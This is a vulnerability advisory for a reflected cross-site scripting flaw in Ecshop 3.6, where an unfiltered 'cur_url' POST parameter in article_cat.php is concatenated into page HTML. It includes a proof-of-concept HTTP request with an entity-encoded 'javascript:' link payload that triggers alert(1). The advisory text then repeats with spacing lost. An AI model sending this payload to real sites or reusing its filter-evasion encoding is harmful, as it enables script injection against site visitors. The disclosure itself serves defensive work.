Summary
Ecshop 3.6 is susceptible to a reflected XSS attack.
The flaw exists due to improper handling and concatenation of user-supplied input in the construction of HTML form elements, leading to potential execution of malicious scripts.
Details
In ecshop/article_cat.php, we can see that the code assigns the value of $_POST['cur_url'] to $search_url, but it is not filtered.
In ecshop/temp/compiled/article_cat.dwt.php, $search_url is directly concatenated into the code, which leads to a reflective XSS vulnerability.
Proof of Concept (POC)
POST /article_cat.php?id=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: 192.168.160.158:1042
Connection: Keep-alive
cur_url=http://www.example.com">%3ca%20href%3dj%26%2397v%26%2397script%26%23x3A%3b%26%2397lert(1)%3eClickMe<!--&id=1&keywords=1
Summary
Ecshop 3.6 is susceptible to a reflected XSS attack.
The flaw exists due to improper handling and concatenation of user-supplied input in the construction of HTML form elements, leading to potential execution of malicious scripts.
Details
In
ecshop/article_cat.php, we can see that the code assigns the value of$_POST['cur_url']to$search_url, but it is not filtered.In
ecshop/temp/compiled/article_cat.dwt.php,$search_urlis directly concatenated into the code, which leads to a reflective XSS vulnerability.Proof of Concept (POC)